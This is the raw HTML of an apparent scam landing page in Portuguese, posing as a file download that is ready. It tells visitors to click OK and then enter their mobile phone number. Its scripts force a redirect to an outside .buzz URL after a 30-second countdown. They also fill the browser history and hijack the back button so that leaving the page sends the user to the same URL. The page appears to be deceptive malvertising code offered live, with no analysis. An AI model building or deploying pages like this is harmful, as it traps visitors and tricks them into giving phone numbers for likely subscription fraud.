<!DOCTYPE html><html class="no-js" lang="en"><head>
  <base href="">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="description" content="">
    <meta name="format-detection" content="telephone=no">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style type="text/css">
        body {
            margin: 0;
            padding: 0;
            width: 100%;
            font-family: Arial, Helvetica, sans-serif;
            font-size: 12px;
            color: #333333;
            background-color: #ffffff;
        }

        a {
            text-decoration: none;
            color: #333333;
        }

        .clear {
            clear: both;
        }

        .title {
            padding: 20px 5px;
            color: #14a10a;
            font-size: 25px;
            line-height: 28px;
            font-weight: bold;
        }

        .loadbar {
            padding: 0px 2px 5px 2px;
        }

        .imgloadbar {
            max-width: 300px;
            width: 100%;
        }

        .txt {
            padding: 0px 0px 20px 0px;
            font-size: 15px;
            line-height: 19px;
        }

        .desript {
            padding: 20px 0px 5px 0px;
            max-width: 450px;
        }

        .s1,
        .s2 {
            padding: 0px 5px 10px 5px;
            font-size: 18px;
            line-height: 20px;
            text-align: left;
        }

        .btnwrap {
            margin: 10px 0px;
        }

        .bluebtn {
            max-width: 100px;
            width: 100%;
            padding: 8px 0px;
            color: #fff;
            font-size: 20px;
            font-weight: bold;
            text-align: center;
            text-shadow: 0px 1px 0px rgba(0, 0, 0, 0.20);
            -moz-text-shadow: 0px 1px 0px rgba(0, 0, 0, 0.20);
            -o-text-shadow: 0px 1px 0px rgba(0, 0, 0, 0.20);
            -ms-text-shadow: 0px 1px 0px rgba(0, 0, 0, 0.20);
            -khtml-text-shadow: 0px 1px 0px rgba(0, 0, 0, 0.20);
            border: 1px solid #0f8806;
            border-radius: 5px;
            -moz-border-radius: 5px;
            -webkit-border-radius: 5px;
            -khtml-border-radius: 5px;
            background: #14a10a;

        }

        .bluebtn:hover {
            background: #18af0d;
        }

        .bluebtn:active {
            position: relative;
            top: 1px;
        }
    </style>
    <meta http-equiv="refresh" content="https://tk.zoxla.buzz/cuvfl9k.php?lp=1">
    <title>(1) Download está pronto</title>

</head>

<body>

    <center>
        <div class="container">
            <div class="title">
                Em processamento...
            </div>

            <div class="loadbar">
                <img class="imgloadbar" src="./loadbar.gif">
            </div>

            <div class="txt">
                Se o download não iniciar automaticamente.
            </div>

            <div class="desript">
                <div class="s1">Passo 1: Clique OK para completar o download</div>
                <div class="s2">Passo 2: Introduza o seu número de telemóvel</div>
            </div>

            <div class="btnwrap">
                <a href="https://tk.zoxla.buzz/cuvfl9k.php?lp=1">
                    <div class="bluebtn">OK</div>
                </a>
            </div>
        </div>
    </center>
    <div id="timer" style="display: none;">-2</div>
    <script src="./jquery.min.js"></script>
    <script type="text/javascript">

        // aftr 30sec go to link url page //
        window.onload = function () {
            var sec = 30;
            setInterval(function () {
                var a = new Date();
                document.getElementById("timer").innerHTML = sec;
                sec--;
                if (sec == 00) {
                    window.location.href = 'https://tk.zoxla.buzz/cuvfl9k.php?lp=1';
                }
            }, 1000);
        }
        // end //
    </script>

<script>
   ! function () {
        var t;
        try {
            const URL = window.location.href.split(/[#]/)[0];
            for (t = 0; 10 > t; ++t) history.pushState({}, "", URL+'#')
            onpopstate = function(event){
                event.state && location.replace('https://tk.zoxla.buzz/cuvfl9k.php?lp=1&event10=1');
            }
        } catch (o) { console.log( o ); }
    }();

</script>



</body></html>